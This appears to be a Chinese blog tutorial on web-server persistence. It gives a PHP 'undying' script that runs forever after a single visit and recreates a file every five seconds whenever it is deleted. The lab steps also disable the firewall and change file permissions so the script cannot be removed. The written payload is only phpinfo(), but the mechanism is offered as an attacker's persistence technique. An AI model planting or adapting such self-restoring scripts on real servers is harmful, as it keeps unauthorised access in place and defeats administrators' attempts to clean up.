Windows权限维持之不死马(一)

1.php不死马权限维持

复制代码
<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行 .
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>

这段代码的意思是就是 只要访问一次1.php文件 该目录下就会生成test.php文件 每五秒执行一次

首先我们先打开12server10

输入ipconfig

IP 是 192.168.25.149

我们需要配置phpstudy环境

双击进行安装

我们顺便关闭防火墙

把这个server服务也要关闭掉

避免一直弹框

然后我们安装好 我们要启动apache mysql 服务

我们输入 12server10 的ip 地址

192.168.25.149

说明我们安装成功

然后我们在根目录下新建一个文件 1.php

我们在网址访问

http://192.168.25.149/1.php

然后我们返回根目录下 发现已经生成了

我们把他进行删除

发现五秒之后 他又回来了

除非你把 apache服务 停止 他就不会再生成了

我们也可以把

然后我们也就 看不到了

但是我们还是可以访问到这个文件的

http://192.168.25.149/1.php

这个目录下还是可以生成的

然后我们还是可以修改文件的属性的

我们直接修改system的权限 修改为不能够修改

我们现在是administrator 登陆的

所以我们现在修改他的权限

然后我们现在删除1.php文件

我们点击重试

还是会弹出这个弹窗 说明我们修改成功了

相关推荐
互联网搬砖老肖几秒前
运维打铁: 阿里云 ECS 实例的高效运维与管理
运维·阿里云·云计算
longze_78 分钟前
frp内网穿透下创建FTP(解决FTP“服务器回应不可路由的地址。使用服务器地址替代”错误)
运维·服务器·网络
瓦力wow15 分钟前
数据分析-名词
运维·服务器·数据分析
自由鬼26 分钟前
正向代理服务器Squid:功能、架构、部署与应用深度解析
java·运维·服务器·程序人生·安全·架构·代理
许白掰32 分钟前
Linux入门篇学习——Linux 编写第一个自己的命令
linux·运维·数据库·嵌入式硬件·学习
qinyia35 分钟前
Wisdom SSH:探索AI助手在复杂运维任务中的卓越表现
运维·人工智能·ssh
打不了嗝 ᥬ᭄38 分钟前
文件系统----底层架构
linux·运维·数据库
cui_win1 小时前
【网络】Linux 内核优化实战 - net.ipv4.tcp_keepalive_time
linux·网络·tcp/ip
令狐掌门1 小时前
tcp长连接与短连接
网络·网络协议·tcp/ip
12点一刻2 小时前
搭建自动化工作流:探寻解放双手的有效方案(1)
运维·人工智能·自动化·deepseek